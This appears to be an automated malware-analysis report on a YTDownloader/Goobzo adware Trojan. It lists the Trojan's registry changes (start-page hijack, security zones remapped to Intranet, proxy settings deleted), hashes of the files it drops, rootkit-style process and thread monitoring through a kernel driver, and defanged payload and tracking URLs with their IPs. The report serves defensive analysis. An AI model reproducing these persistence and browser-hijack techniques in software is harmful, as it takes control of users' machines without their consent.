"Seed" = "3A A5 A4 5E 3E 49 99 04 02 43 0F D2 FC F6 93 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www-searching.com/?pid=s&s=F8Tzamodk0,99999999-9999-4ee6-b5f5-a35f9c2d9d06&vp=ch&prd=set"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process find.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB E0 70 36 1F C6 89 49 B0 AE ED 62 4A 2C 64 0D"

Dropped PE files

MD5 File path
b4c79bd938e7a68133ce4989f0796c3e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Installer\Install_13875\DC%original file name%.exe
b4c79bd938e7a68133ce4989f0796c3e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Installer\Install_8361\DC%original file name%.exe
05c47da12b0009bd98653f51287f7768 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_9382\bxsdk32.dll
5d669deb08c6a6c70fd2bc96b3af38ac c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Install_9382\ins_ytd.exe
b4c79bd938e7a68133ce4989f0796c3e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsj3.tmp\DC%original file name%.exe
c5bf0ea484893a959b3ef0e7f041f379 c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll
29f111a07a51d38b8379171d3cf39ddb c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe
2dd50829f5ce91e033636553405263ca c:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe
a879b0ae2ad98ac8e1c0f8912837eb2d c:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll
5931f1438015a3e263226d6ea4a8b182 c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe
675f7fdc1224c197df5e7eef84d1a8f9 c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll
10ba4048085923cf264eaeee708e98ab c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe
556b1f1d6fd1f191c77b1167cd006abc c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe
c9828a10a4b5644cf236b1cce749dddb c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys
45960b40c1ecb75ed5549a80049879e1 c:\Program Files\YTDownloader\AniGIF.ocx
2154c11f1766ef4283ae7d54888125eb c:\Program Files\YTDownloader\BrowserHelper.exe
2c79072a72a4babbb7b6325e3c435d0d c:\Program Files\YTDownloader\BrowserHelperSrv.exe
9ab07bbccb138201096388679a8812a3 c:\Program Files\YTDownloader\DownloadAPI.dll
c484a04b0fe5743b1e8e34c70c241f45 c:\Program Files\YTDownloader\DownloadHelper.exe
a97e9c8ebee10ff1df6d73938dcb5502 c:\Program Files\YTDownloader\Unelevate.exe
7c98d6fcf82adc7b0cf14ca04d128655 c:\Program Files\YTDownloader\Updater.exe
9f587355ef340b7f229cb86ebdfcf54f c:\Program Files\YTDownloader\YTDUninstall.exe
7fd3d9bb2689dbf8e90fb2c1217e1ac1 c:\Program Files\YTDownloader\YTDownloader.exe
56f5838817026eeb7604049304606e00 c:\Program Files\YTDownloader\converter.exe
fbb160d9fc7ba584b627e0267d0b8043 c:\Program Files\YTDownloader\libeay32.dll
e519f2bf8d35627aa8c712aa636f52ff c:\Program Files\YTDownloader\rtmpdump.exe
58675cb18b037745201e27340a05a823 c:\Program Files\YTDownloader\sbmntr.sys
c0ca162d62aedd6e7d179ed6bc6c102e c:\Program Files\YTDownloader\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls the loading of executable images into memory by installing the load-image notifier.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.11.11010.750
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.11010.750
File Description:
Comments:
Language: Language Neutral

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy  Section MD5
.text   4096             23522         23552     4.49264  9dfc1bc55ef90dfdde51b4a47a602ee6
.rdata  28672            4558          4608      3.6294   5801d712ecba58aa87d1e7d1aa24f3aa
.data   36864            108504        1024      3.41753  f1bf988467c2a1fe94575f6d3e66d158
.ndata  147456           36864         0         0        d41d8cd98f00b204e9800998ecf8427e
.rsrc   184320           3016          3072      3.09173  18abfe8d74101788e2f63818053a2173

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 6

URLs

URL IP
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWEmvGwE2ItoihD9gPpiV Hiz4gguKWlYXXFG19d2lv/HJ3iKHvUBVBgUcVzVK9Vv1jMSmYkL7hHK6EQb8iyo3pEeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcfyawYzTk7BWxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FKHdtdgGHkZrI4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1 3McsuF4cIQ== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEXuAG0Hn6RhSl2loKLeLycAJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=PcwT4QFtuPDEA05CBT6a0a4CrgF/oVkXhiJeNe9dCpGmy6t0 u4xzf2TEkHeJNDU8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT/XpciovEgse2DHUe356ADpreizXIw2lEUbPLm xNo0/Q2TwyUgITHw7M71aw1jTiyjv1xK4cZYkyPbkKqymX8SAU 363aeyXs1AoyOtVJIk2k Fnd7x9HpjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsMss0xdmNFlbg== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=WVbe3wHlwMEinMwQKODRlCGn4C mEEfxIM0CqmsRfbtxTYwWxYG9WEEY41XBMtFk/h9mchShIbSrOSgjjO/wQWUl0xzv/1Q131fTgrR12XxM0RSkMVjMOymF904v4t2DZ0d7GEGeHAhiVQeEeICkE1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFmOdeW8Cm Pw= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=lOCrbsNL2zUH/Xh5Gdj8QRto1MEeYN4JnvZi s3jtzHZ5YIGg5oNPurVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fd/XCztdoPbJFiFlIaXxqEcmxw368usKjODQ8kqa2OFucrnwHv6 D0kjg8U5er5Kbb8P2ueh3oC2Lhrdc92pjLAMCH7VE 0 bpzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL79A76Wdf5bQVO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk 198.232.124.192
hxxp://d11sfnc01fj8ag.cloudfront.net/SetterExeV18.exe 54.239.168.230
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA5Mtw6p9U5dKYX3Ti/i3YNxO48S9k5zx0ojLX6lvBJsJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRiqLcCluTqqII/cF0MPn9zRwDRqTlsHMWE5IN3j9H2v 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=2fVCHF6kf8jCiOnT8Um5ojRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWJKvgNPDm5dkjgb6v7cXpPth71QQSR2eRlO8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnv6yvMdQ5ObkJ3cUen7qW8MylvemGGqkkkQqQHkZuFkc= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT8IWTdc0BVRzshiWv5Ja8Fbs IILilpWF2W4ZI0w3yOP6AmNqIc/gweVlbgaese6RhKA1//X/jiUoeaRpMgDk3ufIzQ IK/nbD0C88izLTrg/fFTbMNbJ5taoe2/agTRYgklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGKotwKW5Oqogj9wXQw f3NHANGpOWwcxYTkg3eP0fa/4= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=Qoli4LW15gtmS6nlSU/NTiWcJxQhCNYt/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/Lhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gd1mHzxcGoQX 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWL6tRdMI7h/vKYX3Ti/i3YPWPRIVASL5KT5tnTkM 7F4BaFpu1lQbV/yfwmWa4R8zkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWM xh4nuC6oveZAqHIGghM2z4gguKWlYXaO/XErhxliTI9uQqrKZfxIBT7frdp7JezUCjI61UkiTnkgV 4XZT5z4ClmOKwA5tjnHHb7mscIVgbV/yvdriMjwaA8tF5WGLnyvcuu3n6aLNNw5 xDHzYgoVew2AB1B6dSM4OFarGdJKBIumnxm9gbppvl9R6 WhvM9KvXHlNP117c3Fngy/YiYglFcV1P8JUJcm/l/xEvxA6V8R1oJo7qvahkwjxcRjGnDU1S tLbCq4B1iQWYNnk5MTeqccPPQKdfW31f15HrC/m74 efuIFAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcbDfhe8VxCPz 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWA2yDM6d7piii11NaYYxcNku1SXIq07tJg ABjx4/MVnPaT JG0G pPE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 Wu7K8cv9dNF9NtefOTH4Uod212AYeRmsjiTgabm 9Kyo8M2vrtdlce0WSiJ16upXX7cxyy4Xhwh 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWKv9x4TEPS62BPEhRyyBD7DR614fwrEG1qQdf661A7a3sYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVY/xQAo/408bbCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN1YtrOl7BfDWAo1JeSgT 5XmlmKz1/6dN0DuwyzS1Mqn4ls6uYy0joALkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9DwqPoy7y/e9FgAYD7IlOOSp LYLDcsF6Odloy4EgwsaMMPQ SS4HkA== 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=hXeqmv1IpelezyBKiN6u N1vyTAtA4H6YDEAjQn1Lmtt1izXJZF/6vvyuZBJPUqNl5HByWpqmAJFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjzLYAxbXqOnWZKpgXCSq4SDnn5VSfoN/21 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykcF31vgH 2Mri4btG OZIk/2mmPmExLeVKUfdGpw3nUgo1AB0/J1xV VzROXqj/RlgPr3Ugg3/8WtyvhlGeipNVNIPaRbv9tSE6xlJd0h7/gbpA3OICltclTTHWShtgC3tHeY4VvF6cr5U0 aUQ/m crqPmttmFAsg= 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=/9ZmISdorEsAVnWQbAnLWDRFyso9cgVYckYBBdXIKfLCigHpURgZKxfMv/l 8Q4Wfl0yK7ww8bQbTivYZlBvEDiTgabm 9Kyo8M2vrtdlce0WSiJ16upXTcGS76lfQpPfkKZPeLk1IXa8iDQLHG9ikTL6x/aszFCRyUoQuKpbN3VAezdf3aKUZ1oPXyDmfKJGv4KmdiE6A0YxIyJifn4/20i04rg0GqU6QUZ3iN538P2DINu3lc8z4xvUpY0xunjjZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=emKxDesqhYd0cn8dtkQxkGzsB4UpbIWe/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYhhjoXbLyE8Fj0N7bp/0QtQiDxPRY4o5upR90anDedSC8zQYNnumFEUDrjljoTj1aS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=AmLJM6c3sNcinMwQKODRlH//a oiiAE7afZ 1lgBdJh98I3OtgNDmPNwq/ptTPwxG04r2GZQbxA4k4Gm5vvSsqPDNr67XZXHtFkoiderqV1YdEo/sIoh/7X9xJ7cHCGG3Wov6VrYoypQSW6B2fRivsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn51tQUcd/Mb9Q48VIs1kHEk9UB7N1/dopRDky3Dqn1Tl0phfdOL Ldgzss114wpp3H 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=M7A8vgjJHrjHEQ/kk/2L9nRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 03zdJAJ5fHVMItQhIsImUWq6XgKdYL4Li8dDmJkgzV7sEdFuCUHWPT9JluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=yhrBLBbZM9XWk3RCzFhOxt1vyTAtA4H6nvZi s3jtzH3VPP0BYZZ/JwQnkcbjmdiLntfO9v5CwenNguChnjFYxzmkHxvj2IRXcgr8gwCjoRxb8Oz3NykvhuQZCu9SilNqGvv5sqhroCJzCloYCM2TyBeHeUDdpdJsivMaAupUnTb/7 kcvPCjjpeJfJMiPTs0JQd5HxgIXd/dqaEYXgO73EZkAAgR/jmD45dkR0v8UWHBzcD5RH2WGmZgVxWuSt5QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd0FDlcFDeqjJvIG12bLr74m6Sgzed9jU3Gw34XvFcQj8w== 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=j7YMo/n29XPJd3Cl8WpRrjRFyso9cgVYCqZ8E6fZMGYegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSn4/c5CbCMCXDyhRDL0PLamQc6wesLGsUQTxIUcsgQ w4nb2Tq9zCss8dzLecdpLzg== 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=N6dOqWm8Q94fEbCpbJoCfnRyfx22RDGQOvHY8s4Kk0v UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwV195BE3C 033SOzT6mB7 gBPEhRyyBD7D9H9 R1sVvTizl8eRMdimuBHdyxBIzcuHESN9FFCantS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF11Cw3 PgSWkz214Ep0g7IOZQPJMLBJ9NumKmesFqXQXZNzCg/DopP 54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=hWfaA75NtHH85nz5m58wW3Ryfx22RDGQQn7xBp tRz8r4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AefUXC4FfWEqIYCpHZc9ZUaF7EORqfQiLE44G r 3F6T7f9F3I6C91SWT/e9lpr/riA== 54.239.168.183
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=1ZEnpGuz/IRMWLJLfNOM3nRyfx22RDGQ 3BljJYGbcAr4Spdf2ZexFyzOKLYTqXCsGG6qLQR8LceI9VTThLJ3QUOVwUN6qMm8gbXZsuvvibpKDN532NTcQ01xTGsf88 UxX212nyBDCa/en1gDcOKJEEbwQeHz5MQI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiZ26V9rLf5AeeOz7ih67i0zYCpHZc9ZUaHn8nmukLEERo4G r 3F6T7f9F3I6C91SWT/e9lpr/riA== 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/12466.ashx?e=k64GogClQtV0cn8dtkQxkPtwZYyWBm3A/lCDRYG1zoqEh7ps0SQ7EYzpbjeDHyvNqJDnlUORNKJFgAYD7IlOOSp LYLDcsF6Odloy4EgwsYQeCU3GvakyerVyaMS1AoBVcsZgjOTLBig1VAsf0FmYjkTFPZ1 JDTyBfkdHFoABciDxPRY4o5upR90anDedSCd9HiXvVRh4g0C52NwzQxay5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjkqfi2Cw3LBejnZaMuBIMLGjDD0PkkuB5A= 198.232.124.192
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=aQQpsP6/AW3kex8By7Tt8zRFyso9cgVYusz/yP3Ks9EegceCn LKWe/lQO2eO0N8r J80GV4qARlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJQzpy6nz8DG6TnR9dT7ayg3fHrFM BTebXDbzJkSidOU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOT021585MfhSpFgjcTf6rNyqUVvKp9Lg9XHvdM54V2LCI4G r 3F6T7NPnGVVVl/P0B6w5tb RMu8qEoEbTUKVP 54.239.168.183
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6FzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPt9ePa7EDGSBlkjSRpv2UaTaJBfeNRzkdxluevdybjIM/AF/Crll2X X6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzjw== 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF0ZnIhubsYOdECOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/YTDownloaderFull.exe 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH6MAVuazOQA/ySFcG0T/jYU B 0jBTIO6c/Y3m6kr9yYrPiCC4paVhduf EAUeb6vWyyBfgdC/MPMTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rKjwza u12Vx7RZKInXq6ldftzHLLheHCE= 198.232.124.192
hxxp://qko863p80c-mzxspesu.netdna-ssl.com/14314.ashx?e=AmLJM6c3sNcinMwQKODRlNMKbKv8c5VnIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGpjkZwwc6dH4myeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndBQ5XBQ3qoybyBtdmy6 JukoM3nfY1NxsN F7xXEI/M= 198.232.124.192
hxxp://d13s98z2lzti92.cloudfront.net/smw121634dp.exe 54.239.168.213
